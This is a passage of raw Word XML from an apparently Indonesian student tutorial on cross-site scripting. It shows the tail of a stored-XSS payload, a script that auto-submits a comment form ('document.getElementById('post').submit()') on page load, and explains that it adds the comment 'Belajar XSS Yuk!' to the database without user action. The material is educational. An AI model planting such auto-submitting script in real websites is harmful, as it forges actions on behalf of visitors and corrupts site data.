          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>document.getElementById('post').submit();}&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59603B6B" w14:textId="77777777" w:rsidR="00CA7ABD" w:rsidRDefault="00CA7ABD" w:rsidP="00F22FC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4655D8" w14:textId="39A4D2A6" w:rsidR="003D093B" w:rsidRDefault="00CA7ABD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Dari script diatas data akan ditambahkan secara otomatis saat website dibuka yang mana komtar yang akan ditambahkan adalah “Belajar XSS Yuk!”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADDD2AA" w14:textId="3B30B1EF" w:rsidR="00CA7ABD" w:rsidRDefault="00CA7ABD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51926A6" wp14:editId="0BD666C1">
            <wp:extent cx="4596757" cy="2503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044" cy="25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0406" w14:textId="3CD946FD" w:rsidR="00CA7ABD" w:rsidRDefault="00CA7ABD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Dari gambar diatas dapat dilihat bahwa baru terdapat 1 komentar saja sebelum script dijalankan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7685217D" w14:textId="0245471C" w:rsidR="00CA7ABD" w:rsidRDefault="00CA7ABD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C5B957" wp14:editId="55E3345F">
            <wp:extent cx="4838842" cy="2920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663" cy="29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80A7" w14:textId="7D245B2E" w:rsidR="00CA7ABD" w:rsidRDefault="00CA7ABD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script dijalankan secara otomatis data komentar langsung ditambahkan kedalam database seperti yang ditampilkan pada gambar diatas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551B7CDD" w14:textId="085D0E96" w:rsidR="00CA7ABD" w:rsidRDefault="00CA7ABD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053D72" w14:textId="65133E04" w:rsidR="0010438A" w:rsidRDefault="0010438A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3F062E" w14:textId="77777777" w:rsidR="0010438A" w:rsidRDefault="0010438A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4F6841" w14:textId="18677C62" w:rsidR="003D093B" w:rsidRDefault="003D093B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Referensi :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9FC904" w14:textId="1460F088" w:rsidR="003D093B" w:rsidRPr="00F57882" w:rsidRDefault="00F22FCE" w:rsidP="00F57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BC621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https://youtu.be/Iu3QtMy9cpg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3D093B" w:rsidRPr="00F5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C3FE3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B76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51"/>
    <w:rsid w:val="0010438A"/>
    <w:rsid w:val="003D093B"/>
    <w:rsid w:val="004102FB"/>
    <w:rsid w:val="005205AE"/>
    <w:rsid w:val="007C2456"/>
    <w:rsid w:val="00A83551"/>
    <w:rsid w:val="00C70FD5"/>
    <w:rsid w:val="00CA7ABD"/>
    <w:rsid w:val="00E81F76"/>
    <w:rsid w:val="00F22FCE"/>
    <w:rsid w:val="00F57882"/>
    <w:rsid w:val="00F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7C03"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B9927809-2CEE-4EA8-BA7A-7C4C492F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551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82"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00520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Iu3QtMy9c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dirgantara</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ferdi dirgantara</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-02-23T14:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-23T15:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>